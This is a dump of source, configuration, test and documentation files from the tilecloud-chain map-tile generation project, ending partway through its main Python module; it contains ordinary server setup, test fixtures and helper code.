<TileMatrix>\n <ows:Identifier>1</ows:Identifier>\n <ScaleDenominator>178571.42857[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>38</MatrixWidth>\n <MatrixHeight>25</MatrixHeight>\n </TileMatrix>\n <TileMatrix>\n <ows:Identifier>2</ows:Identifier>\n <ScaleDenominator>71428.571428[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>94</MatrixWidth>\n <MatrixHeight>63</MatrixHeight>\n </TileMatrix>\n <TileMatrix>\n <ows:Identifier>3</ows:Identifier>\n <ScaleDenominator>35714.285714[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>188</MatrixWidth>\n <MatrixHeight>125</MatrixHeight>\n </TileMatrix>\n <TileMatrix>\n <ows:Identifier>4</ows:Identifier>\n <ScaleDenominator>17857.142857[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>375</MatrixWidth>\n <MatrixHeight>250</MatrixHeight>\n </TileMatrix>\n </TileMatrixSet>\n </Contents>\n</Capabilities>\"\"\",\n True,\n )\n" }, { 
"alpha_fraction": 0.599930465221405, "alphanum_fraction": 0.6047966480255127, "avg_line_length": 26.663461685180664, "blob_id": "04f3c10aba9769de3126cbe9e21de1c470524396", "content_id": "6038deb1f7d1ee5e59ab827364508552e5373e7e", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2877, "license_type": "permissive", "max_line_length": 95, "num_lines": 104, "path": "/gunicorn.conf.py", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "###\n# app configuration\n# https://docs.gunicorn.org/en/stable/settings.html\n###\n\nimport os\n\nimport gunicorn.arbiter\nimport gunicorn.workers.base\nfrom c2cwsgiutils import get_config_defaults, prometheus\nfrom prometheus_client import multiprocess\n\nbind = \":8080\"\n\nworker_class = \"gthread\"\nworkers = os.environ.get(\"GUNICORN_WORKERS\", 2)\nthreads = os.environ.get(\"GUNICORN_THREADS\", 10)\n\npreload = \"true\"\n\naccesslog = \"-\"\naccess_log_format = os.environ.get(\n \"GUNICORN_ACCESS_LOG_FORMAT\",\n '%(H)s %({Host}i)s %(m)s %(U)s?%(q)s \"%(f)s\" \"%(a)s\" %(s)s %(B)s %(D)s %(p)s',\n)\n\n###\n# logging configuration\n# https://docs.python.org/3/library/logging.config.html#logging-config-dictschema\n###\nlogconfig_dict = {\n \"version\": 1,\n \"root\": {\n \"level\": os.environ[\"OTHER_LOG_LEVEL\"],\n \"handlers\": [os.environ[\"LOG_TYPE\"]],\n },\n \"loggers\": {\n \"gunicorn.error\": {\"level\": os.environ[\"GUNICORN_LOG_LEVEL\"]},\n # \"level = INFO\" logs SQL queries.\n # \"level = DEBUG\" logs SQL queries and results.\n # \"level = WARN\" logs neither. (Recommended for production systems.)\n \"sqlalchemy.engine\": {\"level\": os.environ[\"SQL_LOG_LEVEL\"]},\n \"c2cwsgiutils\": {\"level\": os.environ[\"C2CWSGIUTILS_LOG_LEVEL\"]},\n \"tilecloud\": {\"level\": os.environ[\"TILECLOUD_LOG_LEVEL\"]},\n \"tilecloud_chain\": {\"level\": os.environ[\"TILECLOUD_CHAIN_LOG_LEVEL\"]},\n },\n \"handlers\": {\n \"console\": {\n \"class\": \"logging.StreamHandler\",\n \"formatter\": \"generic\",\n \"stream\": \"ext://sys.stdout\",\n },\n \"json\": {\n \"class\": \"tilecloud_chain.JsonLogHandler\",\n \"formatter\": \"generic\",\n \"stream\": \"ext://sys.stdout\",\n },\n },\n \"formatters\": {\n \"generic\": {\n \"format\": \"%(asctime)s [%(process)d] [%(levelname)-5.5s] %(message)s\",\n \"datefmt\": \"[%Y-%m-%d %H:%M:%S %z]\",\n \"class\": \"logging.Formatter\",\n }\n },\n}\n\nraw_paste_global_conf = [\"=\".join(e) for e in get_config_defaults().items()]\n\n\ndef on_starting(server: gunicorn.arbiter.Arbiter) -> None:\n \"\"\"\n Will start the prometheus server.\n\n Called just before the master process is initialized.\n \"\"\"\n\n del server\n\n prometheus.start()\n\n\ndef post_fork(server: gunicorn.arbiter.Arbiter, worker: gunicorn.workers.base.Worker) -> None:\n \"\"\"\n Will cleanup the configuration we get from the main process.\n\n Called just after a worker has been forked.\n \"\"\"\n\n del server, worker\n\n prometheus.cleanup()\n\n\ndef child_exit(server: gunicorn.arbiter.Arbiter, worker: gunicorn.workers.base.Worker) -> None:\n \"\"\"\n Remove the metrics for the exited worker.\n\n Called just after a worker has been exited, in the master process.\n \"\"\"\n\n del server\n\n multiprocess.mark_process_dead(worker.pid) # type: ignore [no-untyped-call]\n" }, { "alpha_fraction": 0.7396676540374756, "alphanum_fraction": 0.7426502108573914, "avg_line_length": 21.786407470703125, "blob_id": "e3b8f56107b08927430ac3110da2b045fe76bf38", "content_id": 
"baaacbaeef10a6a11b15e686c99eaa32ef759909", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2347, "license_type": "permissive", "max_line_length": 163, "num_lines": 103, "path": "/README.md", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "# TileCloud Chain\n\nThe goal of TileCloud Chain is to provide tools around tile generation on a chain like:\n\nSource: WMS, Mapnik.\n\nOptionally using an SQS queue, AWS host, SNS topic.\n\nDestination in WMTS layout, on S3, on Berkeley DB (`bsddb`), on MBTiles, or on local filesystem.\n\nFeatures:\n\n- Generate tiles.\n- Drop empty tiles.\n- Drop tiles outside a geometry or a bbox.\n- Use MetaTiles.\n- Generate the legend images.\n- Generate GetCapabilities.\n- Generate OpenLayers example page.\n- Obtain the hash of an empty tile.\n- In the future, measure tile generation speed.\n- Calculate cost and generation time.\n- In the future, manage the AWS hosts that generate tiles.\n- Delete empty tiles.\n- Copy files between caches.\n- Be able to use an SQS queue to dispatch the generation.\n- Post processing the generated tiles.\n- ...\n\nLegacy features:\n\n- bsddb support\n- sqlite (mbtiles) support\n- mapnik support (should be updated for Python3)\n\n## Get it\n\nCreate the config file `tilegeneration/config.yaml` see as [example](https://github.com/camptocamp/tilecloud-chain/blob/master/example/tilegeneration/config.yaml).\n\n### Support\n\nOnly the latest release is supported and version &lt; 1.11 contains security issues.\n\n## From sources\n\nBuild it:\n\n```bash\ngit submodule update --recursive\npython3 -m venv .build/venv\n.build/venv/bin/pip install -r requirements.txt\n.build/venv/bin/pip install -e .\n.build/venv/bin/pip install -r dev-requirements.txt\n```\n\n## Run prospector\n\n```bash\n.build/venv/bin/prospector\n```\n\n## Run the tests\n\nSetup your environment:\n\n```bash\ntouch tilecloud_chain/OpenLayers.js\ndocker build --tag camptocamp/tilecloud-chain .\ndocker-compose -p tilecloud up\n```\n\nTo run the tests:\n\n```bash\ndocker-compose -p tilecloud exec test python setup.py nosetests --logging-filter=tilecloud,tilecloud_chain --attr '!'nopy3\n```\n\n## Documentation\n\nAs documentation you can read the `https://github.com/camptocamp/tilecloud-chain/blob/master/tilecloud_chain/USAGE.rst`.\n\n## VSCode\n\nYou can add that in your workspace configuration to use the JSON schema:\n\n```json\n{\n \"yaml.schemas\": {\n \"../tilecloud-chain/tilecloud_chain/schema.json\": [\n \"tilecloud-chain/tilecloud_chain/tests/tilegeneration/*.yaml\"\n ]\n }\n}\n```\n\n## Contributing\n\nInstall the pre-commit hooks:\n\n```bash\npip install pre-commit\npre-commit install --allow-missing-config\n```\n" }, { "alpha_fraction": 0.6358974575996399, "alphanum_fraction": 0.6358974575996399, "avg_line_length": 27.88888931274414, "blob_id": "50b354a249997405b2fb414a5ef8dfac68c37dc1", "content_id": "7cd98c6a2f89a7f7a87744fdd3453382b072fd40", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 780, "license_type": "permissive", "max_line_length": 109, "num_lines": 27, "path": "/tilecloud_chain/tests/test_config.py", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "import os\n\nfrom testfixtures import LogCapture\n\nfrom tilecloud_chain import controller\nfrom tilecloud_chain.tests import CompareCase\n\n\nclass TestConfig(CompareCase):\n def setUp(self) -> None: # 
noqa\n self.maxDiff = None\n\n @classmethod\n def setUpClass(cls): # noqa\n os.chdir(os.path.dirname(__file__))\n\n @classmethod\n def tearDownClass(cls): # noqa\n os.chdir(os.path.dirname(os.path.dirname(os.path.dirname(__file__))))\n\n def test_int_grid(self) -> None:\n with LogCapture(\"tilecloud_chain\") as log_capture:\n self.run_cmd(\n cmd=\".build/venv/bin/generate_controller -c tilegeneration/test-int-grid.yaml --dump-config\",\n main_func=controller.main,\n )\n log_capture.check()\n" }, { "alpha_fraction": 0.6021457314491272, "alphanum_fraction": 0.6325435638427734, "avg_line_length": 23.85555648803711, "blob_id": "d8424a44c9c8c1ac6f9e51b462fddcc68a32b0a5", "content_id": "fc90599328f07b2c6472a314c2ecc42b47cc8d50", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "YAML", "length_bytes": 2237, "license_type": "permissive", "max_line_length": 81, "num_lines": 90, "path": "/docker-compose.yaml", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "version: '2.2'\n\nservices:\n db:\n image: camptocamp/postgres:14-postgis-3\n environment:\n POSTGRES_USER: postgres\n POSTGRES_PASSWORD: postgres\n POSTGRES_DB: tests\n volumes:\n - ./docker/test-db:/docker-entrypoint-initdb.d:ro\n\n mapserver:\n image: camptocamp/mapserver:8.0\n environment:\n MS_DEBUGLEVEL: '5'\n MAPSERVER_CATCH_SEGV: '1'\n MS_MAPFILE: /etc/mapserver/mapserver.map\n volumes:\n - ./docker/mapfile-docker:/etc/mapserver:ro\n links:\n - db:db\n user: www-data\n\n redis_master:\n image: redis:7.0.12\n\n redis_slave:\n image: redis:7.0.12\n command: redis-server --slaveof redis_master 6379\n depends_on:\n - redis_master\n\n redis_sentinel:\n image: camptocamp/c2cwsgiutils-redis-sentinel:6\n environment:\n - MASTER_NAME=mymaster\n - QUORUM=1\n - MASTER=redis_master\n depends_on:\n - redis_master\n\n application: &app\n image: camptocamp/tilecloud-chain\n environment: &app-env\n TILECLOUD_LOG_LEVEL: DEBUG\n TILECLOUD_CHAIN_LOG_LEVEL: DEBUG\n TILECLOUD_CHAIN_SESSION_SECRET: '1234'\n TILECLOUD_CHAIN_SESSION_SALT: '1234'\n C2C_AUTH_GITHUB_REPOSITORY: camptocamp/tilecloud-chain\n C2C_AUTH_GITHUB_SECRET: '1234567890123456789'\n C2C_AUTH_GITHUB_CLIENT_ID: '1234'\n C2C_AUTH_GITHUB_CLIENT_SECRET: '1234'\n links:\n - db\n - mapserver\n - redis_sentinel\n volumes:\n - ./example/tilegeneration/config.yaml:/etc/tilegeneration/config.yaml:ro\n\n app_test_user:\n <<: *app\n environment:\n <<: *app-env\n TEST_USER: Test\n\n test:\n image: camptocamp/tilecloud-chain-tests\n working_dir: /app\n environment:\n CI: 'true'\n TESTS: 'true'\n PGPASSWORD: postgres\n TILE_NB_THREAD: 2\n METATILE_NB_THREAD: 2\n SERVER_NB_THREAD: 2\n TILECLOUD_LOG_LEVEL: DEBUG\n TILECLOUD_CHAIN_LOG_LEVEL: DEBUG\n TILECLOUD_CHAIN_SESSION_SALT: a-long-secret-a-long-secret\n command:\n - sleep\n - infinity\n links:\n - db\n - mapserver\n - redis_sentinel\n volumes:\n - ./results:/results\n - ./tilecloud_chain:/app/tilecloud_chain\n # - ../tilecloud/tilecloud:/usr/local/lib/python3.8/dist-packages/tilecloud\n" }, { "alpha_fraction": 0.5660377144813538, "alphanum_fraction": 0.5998013615608215, "avg_line_length": 33.72413635253906, "blob_id": "2426d01c01a8d5e33fde6f962f7c83f9f69df9f2", "content_id": "ae686d1f2bcab44b8a7611fc53246087ac2795aa", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1007, "license_type": "permissive", "max_line_length": 99, "num_lines": 29, "path": "/tilecloud_chain/format.py", "repo_name": 
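The `redis_sentinel` service in the compose file above exposes the Redis master under the name `mymaster`. A minimal sketch of how a client could resolve the master through it, assuming the default sentinel port 26379 (the compose file does not pin a port) and the `redis` Python package:

```python
from redis.sentinel import Sentinel

# Hostname matches the docker-compose service name; 26379 is the
# default sentinel port (an assumption, not set in the compose file).
sentinel = Sentinel([("redis_sentinel", 26379)], socket_timeout=0.5)

# Resolve a connection to the current master of "mymaster" and check it.
master = sentinel.master_for("mymaster", socket_timeout=0.5)
master.ping()
```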
"camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "from datetime import timedelta\nfrom typing import Tuple\n\n\ndef default_int(number_array: Tuple[float, float, float, float]) -> Tuple[int, int, int, int]:\n \"\"\"Convert an array of float in an array of int.\"\"\"\n return (int(number_array[0]), int(number_array[1]), int(number_array[2]), int(number_array[3]))\n\n\ndef size_format(number: float) -> str:\n \"\"\"Get human readable size.\"\"\"\n for unit in [\"o\", \"Kio\", \"Mio\", \"Gio\", \"Tio\"]:\n if number < 1024.0:\n if number < 10:\n return f\"{number:.1f} {unit}\"\n else:\n return f\"{number:.0f} {unit}\"\n number /= 1024.0\n return f\"{number:.0f} Tio\"\n\n\ndef duration_format(duration: timedelta) -> str:\n \"\"\"Get human readable duration.\"\"\"\n hours, remainder = divmod(duration.seconds, 3600)\n minutes, seconds = divmod(remainder, 60)\n if duration.days > 0:\n return f\"{duration.days} {hours}:{minutes:02d}:{seconds:02d}\"\n else:\n return f\"{hours}:{minutes:02d}:{seconds:02d}\"\n" }, { "alpha_fraction": 0.7636632323265076, "alphanum_fraction": 0.7725258469581604, "avg_line_length": 25.038461685180664, "blob_id": "37a349abf38e2f0255096ebe66cd80333d945491", "content_id": "b6107a2c1224b6d3e308815d0c421125302a045b", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 677, "license_type": "permissive", "max_line_length": 84, "num_lines": 26, "path": "/production.ini", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "###\n# app configuration\n# http://docs.pylonsproject.org/projects/pyramid/en/1.6-branch/narr/environment.html\n###\n\n[app:app]\nuse = egg:tilecloud-chain\nfilter-with = proxy-prefix\n\npyramid.reload_templates = %(DEVELOPMENT)s\npyramid.debug_authorization = %(DEVELOPMENT)s\npyramid.debug_notfound = %(DEVELOPMENT)s\npyramid.debug_routematch = %(DEVELOPMENT)s\npyramid.debug_templates = %(DEVELOPMENT)s\npyramid.default_locale_name = en\n\nc2c.base_path = /c2c\n\ntilegeneration_configfile = %(TILEGENERATION_CONFIGFILE)s\n\n[pipeline:main]\npipeline = egg:c2cwsgiutils#client_info egg:c2cwsgiutils#sentry app\n\n[filter:proxy-prefix]\nuse = egg:PasteDeploy#prefix\nprefix = %(VISIBLE_ENTRY_POINT)s\n" }, { "alpha_fraction": 0.3723404109477997, "alphanum_fraction": 0.4645390212535858, "avg_line_length": 22.5, "blob_id": "6d9aaa48c82ae9f38e63e1ed87634a565116ca65", "content_id": "74c199e0c983f9c926b722e04a0d5280fe5a703a", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 282, "license_type": "permissive", "max_line_length": 29, "num_lines": 12, "path": "/SECURITY.md", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "# Security Policy\n\n## Supported Versions\n\n| Version | Supported Until |\n| ------- | --------------- |\n| <= 1.13 | Unsupported |\n| 1.14 | Unsupported |\n| 1.15 | Best effort |\n| 1.16 | Unsupported |\n| 1.17 | 23/06/2025 |\n| 1.18 | Best effort |\n" }, { "alpha_fraction": 0.38553711771965027, "alphanum_fraction": 0.5177651047706604, "avg_line_length": 41.97604751586914, "blob_id": "69dc3b97a93df27bdaf2397ec2df63f409954a5a", "content_id": "4875cda4d906be7f1fba665a198d9b10c51e77ed", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7177, "license_type": "permissive", "max_line_length": 103, "num_lines": 167, "path": "/tilecloud_chain/tests/test_expiretiles.py", "repo_name": 
"camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "import os\nfrom typing import Tuple\n\nimport psycopg2\nimport pytest\nfrom testfixtures import LogCapture\n\nfrom tilecloud_chain import expiretiles\nfrom tilecloud_chain.tests import CompareCase, MatchRegex\n\n\nclass TestExpireTiles(CompareCase):\n def setUp(self) -> None: # noqa\n self.maxDiff = None\n\n @classmethod\n def setUpClass(cls): # noqa\n with open(\"/tmp/expired\", \"w\") as f:\n f.write(\"18/135900/92720\\n\")\n f.write(\"18/135900/92721\\n\")\n f.write(\"18/135900/92722\\n\")\n f.write(\"18/135901/92721\\n\")\n f.write(\"18/135901/92722\\n\")\n f.write(\"18/135902/92722\\n\")\n\n with open(\"/tmp/expired-empty\", \"w\"):\n pass\n\n @classmethod\n def tearDownClass(cls): # noqa\n os.remove(\"/tmp/expired\")\n os.remove(\"/tmp/expired-empty\")\n\n def test_expire_tiles(\n self,\n ) -> None:\n with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n geom_re = MatchRegex(r\"MULTIPOLYGON\\(\\(\\(([0-9\\. ,]+)\\)\\)\\)\")\n geom_coords = [\n pytest.approx([538274.006497397, 151463.940954133], abs=1e-6),\n pytest.approx([538272.927475664, 151358.882137848], abs=1e-6),\n pytest.approx([538167.532395446, 151359.965536437], abs=1e-6),\n pytest.approx([538062.137334338, 151361.050781072], abs=1e-6),\n pytest.approx([537956.742292377, 151362.137871759], abs=1e-6),\n pytest.approx([537957.826834589, 151467.19663084], abs=1e-6),\n pytest.approx([537958.911357866, 151572.253567259], abs=1e-6),\n pytest.approx([537959.995862209, 151677.308681051], abs=1e-6),\n pytest.approx([538065.385383791, 151676.221647663], abs=1e-6),\n pytest.approx([538064.302719542, 151571.166514773], abs=1e-6),\n pytest.approx([538169.694100363, 151570.08130827], abs=1e-6),\n pytest.approx([538168.61325734, 151465.024333685], abs=1e-6),\n pytest.approx([538274.006497397, 151463.940954133], abs=1e-6),\n ]\n\n self.assert_cmd_equals(\n cmd=[\n \".build/venv/bin/import_expiretiles\",\n \"--create\",\n \"--delete\",\n \"--srid\",\n \"21781\",\n \"/tmp/expired\",\n \"user=postgres password=postgres dbname=tests host=db\",\n \"expired\",\n \"the_geom\",\n ],\n main_func=expiretiles.main,\n expected=\"\"\"Import successful\n \"\"\",\n )\n connection = psycopg2.connect(\"user=postgres password=postgres dbname=tests host=db\")\n cursor = connection.cursor()\n cursor.execute(\"SELECT ST_AsText(the_geom) FROM expired\")\n geoms = [str(r[0]) for r in cursor.fetchall()]\n assert [geom_re] == geoms\n\n def parse_coord(coord: str) -> Tuple[float, float]:\n coord_split = coord.split(\" \")\n return [float(c) for c in coord_split]\n\n assert [parse_coord(e) for e in geom_re.match(geoms[0]).group(1).split(\",\")] == geom_coords\n\n self.assert_cmd_equals(\n cmd=[\n \".build/venv/bin/import_expiretiles\",\n \"--create\",\n \"--delete\",\n \"--srid\",\n \"21781\",\n \"/tmp/expired\",\n \"user=postgres password=postgres dbname=tests host=db\",\n \"expired\",\n \"the_geom\",\n ],\n main_func=expiretiles.main,\n expected=\"\"\"Import successful\n \"\"\",\n )\n connection = psycopg2.connect(\"user=postgres password=postgres dbname=tests host=db\")\n cursor = connection.cursor()\n cursor.execute(\"SELECT ST_AsText(the_geom) FROM expired\")\n geoms = [str(r[0]) for r in cursor.fetchall()]\n assert [geom_re] == geoms\n assert [parse_coord(e) for e in geom_re.match(geoms[0]).group(1).split(\",\")] == geom_coords\n\n self.assert_cmd_equals(\n cmd=[\n \".build/venv/bin/import_expiretiles\",\n \"--simplify\",\n \"1000\",\n \"--create\",\n \"--delete\",\n \"/tmp/expired\",\n 
\"user=postgres password=postgres dbname=tests host=db\",\n \"expired2\",\n ],\n main_func=expiretiles.main,\n expected=\"\"\"Import successful\n \"\"\",\n )\n connection = psycopg2.connect(\"user=postgres password=postgres dbname=tests host=db\")\n cursor = connection.cursor()\n cursor.execute(\"SELECT ST_AsText(geom) FROM expired2\")\n geoms = [str(r[0]) for r in cursor.fetchall()]\n geom_coords = [\n pytest.approx([738534.567188568, 5862720.06865692], abs=1e-6),\n pytest.approx([738534.567188568, 5862567.19460037], abs=1e-6),\n pytest.approx([738381.693132021, 5862567.19460037], abs=1e-6),\n pytest.approx([738228.819075469, 5862567.19460037], abs=1e-6),\n pytest.approx([738075.945018921, 5862567.19460037], abs=1e-6),\n pytest.approx([738075.945018921, 5862720.06865692], abs=1e-6),\n pytest.approx([738075.945018921, 5862872.94271347], abs=1e-6),\n pytest.approx([738075.945018921, 5863025.81677002], abs=1e-6),\n pytest.approx([738228.819075469, 5863025.81677002], abs=1e-6),\n pytest.approx([738228.819075469, 5862872.94271347], abs=1e-6),\n pytest.approx([738381.693132021, 5862872.94271347], abs=1e-6),\n pytest.approx([738381.693132021, 5862720.06865692], abs=1e-6),\n pytest.approx([738534.567188568, 5862720.06865692], abs=1e-6),\n ]\n assert [geom_re] == geoms\n assert [parse_coord(e) for e in geom_re.match(geoms[0]).group(1).split(\",\")] == geom_coords\n\n log_capture.check()\n\n def test_expire_tiles_empty(self) -> None:\n with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n self.assert_cmd_equals(\n cmd=[\n \".build/venv/bin/import_expiretiles\",\n \"--create\",\n \"--delete\",\n \"--srid\",\n \"21781\",\n \"/tmp/expired-empty\",\n \"user=postgres password=postgres dbname=tests host=db\",\n \"expired\",\n \"the_geom\",\n ],\n main_func=expiretiles.main,\n expected=\"\"\"No coords found\n \"\"\",\n )\n connection = psycopg2.connect(\"user=postgres password=postgres dbname=tests host=db\")\n cursor = connection.cursor()\n cursor.execute(\"SELECT the_geom FROM expired\")\n geoms = cursor.fetchall()\n self.assertEqual(len(geoms), 0)\n" }, { "alpha_fraction": 0.5296049118041992, "alphanum_fraction": 0.5354918837547302, "avg_line_length": 37.30424880981445, "blob_id": "171c801460719dccf1b23e63a8f047208b6d217b", "content_id": "3f6cf91f769c71daca4d8eec167956fe764dbaee", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 67607, "license_type": "permissive", "max_line_length": 178, "num_lines": 1765, "path": "/tilecloud_chain/__init__.py", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "import collections\nimport json\nimport logging\nimport logging.config\nimport math\nimport os\nimport pathlib\nimport pkgutil\nimport queue\nimport re\nimport sqlite3\nimport subprocess # nosec\nimport sys\nimport tempfile\nimport threading\nimport time\nfrom argparse import ArgumentParser, Namespace\nfrom concurrent.futures import ThreadPoolExecutor\nfrom datetime import datetime, timedelta\nfrom fractions import Fraction\nfrom hashlib import sha1\nfrom io import BytesIO\nfrom itertools import product\nfrom math import ceil, sqrt\nfrom typing import (\n IO,\n TYPE_CHECKING,\n Any,\n Callable,\n Dict,\n Iterable,\n Iterator,\n List,\n Optional,\n TextIO,\n Tuple,\n TypedDict,\n Union,\n cast,\n)\n\nimport boto3\nimport botocore.client\nimport c2cwsgiutils.pyramid_logging\nimport c2cwsgiutils.setup_process\nimport jsonschema_validator\nimport psycopg2\nfrom c2cwsgiutils import sentry\nfrom PIL import 
Image\nfrom prometheus_client import Counter, Summary\nfrom ruamel.yaml import YAML\nfrom shapely.geometry.base import BaseGeometry\nfrom shapely.geometry.polygon import Polygon\nfrom shapely.ops import unary_union\nfrom shapely.wkb import loads as loads_wkb\n\nimport tilecloud.filter.error\nimport tilecloud_chain.configuration\nimport tilecloud_chain.security\nfrom tilecloud import BoundingPyramid, Tile, TileCoord, TileGrid, TileStore, consume\nfrom tilecloud.filter.error import LogErrors, MaximumConsecutiveErrors\nfrom tilecloud.filter.logger import Logger\nfrom tilecloud.grid.free import FreeTileGrid\nfrom tilecloud.layout.wmts import WMTSTileLayout\nfrom tilecloud.store.azure_storage_blob import AzureStorageBlobTileStore\nfrom tilecloud.store.filesystem import FilesystemTileStore\nfrom tilecloud.store.mbtiles import MBTilesTileStore\nfrom tilecloud.store.metatile import MetaTileSplitterTileStore\nfrom tilecloud.store.redis import RedisTileStore\nfrom tilecloud.store.s3 import S3TileStore\nfrom tilecloud.store.sqs import SQSTileStore, maybe_stop\nfrom tilecloud_chain.multitilestore import MultiTileStore\nfrom tilecloud_chain.timedtilestore import TimedTileStoreWrapper\n\n_LOGGER = logging.getLogger(__name__)\n\n\n_ERROR_COUNTER = Counter(\"tilecloud_chain_error_counter\", \"Number of errors\", [\"layer\", \"host\"])\n_GEOMS_GET_SUMMARY = Summary(\"tilecloud_chain_geoms_get\", \"Geoms filter get\", [\"layer\", \"host\"])\n\n\ndef formated_metadata(tile: Tile) -> str:\n    \"\"\"Get human readable string of the metadata.\"\"\"\n    metadata = dict(tile.metadata)\n    if \"tiles\" in metadata:\n        metadata[\"tiles\"] = metadata[\"tiles\"].keys()  # type: ignore\n    return \" \".join([f\"{k}={metadata[k]}\" for k in sorted(metadata.keys())])\n\n\nsetattr(Tile, \"formated_metadata\", property(formated_metadata))\n\n\ndef add_common_options(\n    parser: ArgumentParser,\n    tile_pyramid: bool = True,\n    no_geom: bool = True,\n    near: bool = True,\n    time: bool = True,  # pylint: disable=redefined-outer-name\n    dimensions: bool = False,\n    cache: bool = True,\n    default_config_file: bool = False,\n) -> None:\n    \"\"\"Get the options used by some commands.\"\"\"\n    c2cwsgiutils.setup_process.fill_arguments(parser)\n    parser.add_argument(\n        \"-c\",\n        \"--config\",\n        default=os.environ.get(\"TILEGENERATION_CONFIGFILE\", \"tilegeneration/config.yaml\")\n        if default_config_file\n        else None,\n        help=\"path to the configuration file\",\n        metavar=\"FILE\",\n    )\n    parser.add_argument(\n        \"--host\", help=\"the host name used in JSON logs and in the Prometheus stats\", default=\"localhost\"\n    )\n    parser.add_argument(\n        \"--ignore-error\",\n        action=\"store_true\",\n        help=\"continue if there is an error in the configuration\",\n    )\n    parser.add_argument(\"-l\", \"--layer\", metavar=\"NAME\", help=\"the layer to generate\")\n    if tile_pyramid:\n        parser.add_argument(\n            \"-b\",\n            \"--bbox\",\n            nargs=4,\n            type=float,\n            metavar=(\"MINX\", \"MINY\", \"MAXX\", \"MAXY\"),\n            help=\"restrict to specified bounding box\",\n        )\n        parser.add_argument(\n            \"-z\",\n            \"--zoom\",\n            help=\"restrict to specified zoom level, or a zooms range (2-5), or a zooms list (2,4,5)\",\n        )\n        parser.add_argument(\n            \"-t\", \"--test\", type=int, help=\"test with generating N tiles, and add log messages\", metavar=\"N\"\n        )\n        if near:\n            parser.add_argument(\n                \"--near\",\n                type=float,\n                nargs=2,\n                metavar=(\"X\", \"Y\"),\n                help=\"This option is a good replacement for --bbox, to be used with \"\n                \"--time or --test and --zoom, implies --no-geom. 
\"\n \"It automatically measure a bbox around the X Y position that corresponds to the metatiles.\",\n )\n if time:\n parser.add_argument(\n \"--time\",\n \"--measure-generation-time\",\n dest=\"time\",\n metavar=\"N\",\n type=int,\n help=\"Measure the generation time by creating N tiles to warm-up, \"\n \"N tile to do the measure and N tiles to slow-down\",\n )\n if no_geom:\n parser.add_argument(\n \"--no-geom\",\n default=True,\n action=\"store_false\",\n dest=\"geom\",\n help=\"Don't the geometry available in the SQL\",\n )\n if dimensions:\n parser.add_argument(\n \"--dimensions\",\n nargs=\"+\",\n metavar=\"DIMENSION=VALUE\",\n default=[],\n help=\"overwrite the dimensions values specified in the config file\",\n )\n if cache:\n parser.add_argument(\"--cache\", dest=\"cache\", metavar=\"NAME\", help=\"The cache name to use\")\n parser.add_argument(\"-q\", \"--quiet\", default=False, action=\"store_true\", help=\"Display only errors.\")\n parser.add_argument(\"-v\", \"--verbose\", default=False, action=\"store_true\", help=\"Display info message.\")\n parser.add_argument(\n \"-d\",\n \"--debug\",\n default=False,\n action=\"store_true\",\n help=\"Display debug message, and stop on first error.\",\n )\n\n\ndef get_tile_matrix_identifier(\n grid: tilecloud_chain.configuration.Grid, resolution: Optional[float] = None, zoom: Optional[int] = None\n) -> str:\n \"\"\"Get an identifier for a tile matrix.\"\"\"\n if grid is None or grid[\"matrix_identifier\"] == \"zoom\":\n return str(zoom)\n else:\n assert zoom is not None\n if resolution is None:\n resolution = grid[\"resolutions\"][zoom]\n if int(resolution) == resolution:\n return str(int(resolution))\n else:\n return str(resolution).replace(\".\", \"_\")\n\n\nclass Run:\n \"\"\"\n Run the tile generation.\n\n Add some logs.\n Manage the max_consecutive_errors.\n \"\"\"\n\n _re_rm_xml_tag = re.compile(\"(<[^>]*>|\\n)\")\n\n def __init__(\n self,\n gene: \"TileGeneration\",\n functions: List[Callable[[Tile], Tile]],\n ) -> None:\n self.gene = gene\n self.functions = functions\n self.safe = gene.options is None or not gene.options.debug\n daemon = gene.options is not None and getattr(gene.options, \"daemon\", False)\n self.max_consecutive_errors = (\n MaximumConsecutiveErrors(gene.get_main_config().config[\"generation\"][\"maxconsecutive_errors\"])\n if not daemon and gene.maxconsecutive_errors\n else None\n )\n self.error = 0\n self.error_lock = threading.Lock()\n self.error_logger = LogErrors(\n _LOGGER, logging.ERROR, \"Error in tile: %(tilecoord)s, %(formated_metadata)s, %(error)r\"\n )\n\n def __call__(self, tile: Optional[Tile]) -> Optional[Tile]:\n if tile 